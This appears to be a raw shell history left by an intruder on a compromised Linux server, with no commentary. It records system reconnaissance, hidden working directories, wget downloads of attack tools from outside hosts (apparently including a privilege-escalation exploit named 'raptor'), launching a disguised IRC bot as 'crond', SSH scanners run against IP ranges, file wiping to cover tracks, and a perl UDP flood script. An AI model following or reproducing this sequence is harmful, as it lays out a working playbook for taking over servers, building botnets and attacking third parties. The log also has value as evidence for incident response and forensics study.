w
w
uname -a
cat /etc/issue
php -v
cd /var/tmp
mkdir " "
cd " "
ls -a
cd .borwind/
ls
cat vuln.txt 
screen -r
ps aux
cd ..
rm -rf .borwind/
last
cd /t/mp
ls -a
cd /tmp
ls -a
cd /var/tmp
ls
wget http://members.lycos.co.uk/mrx25/raptor
chmod +x raptor 
./raptor 
ls
rm -rf *
ps aux
cd /tmp
cd " "
ls -a
cd /tmp
ls -a
./pwned 
rm -rf *
cd /var/tmp
mkdir .muie
cd .m
ls
cd ..
cd .muie/
ls
ls -a
cd .bot/
ls
cat mech.set
./crond 
cd ..
ls -a
wget shakimel.xhost.ro/florian.tgz
cd /var/tmp
mkdir .mata
cd .mata/
wget shakimel.xhost.ro/florian.tgz
tar xzvf wget shakimel.xhost.ro/florian.tgz 
tar xzvf florian.tgz 
rm -rf florian.tgz 
cd .borwind/
ls
./start 217.91.
./start 217.91
./start 205.234
ssh 
ssh  ftpuser@80.233.197.133
ssh  ftpuser@80.233.197.133
w
ls
uname -a
w
uptime
cd /var/tmp
ls -al
ls
cd evil
ls
cd ..
cd ssh
ls
./a
./scan
./ab2c
cd ab2c
ls
./scan
./scan 85.30;./scan 216.152;./scan 200.102;./scan 62.3./scan 216.89;
ls
cd ..
ls
cd Seth
ls
cd zeus
cd flash
ls
cd ..
cd ..
perl udp.pl
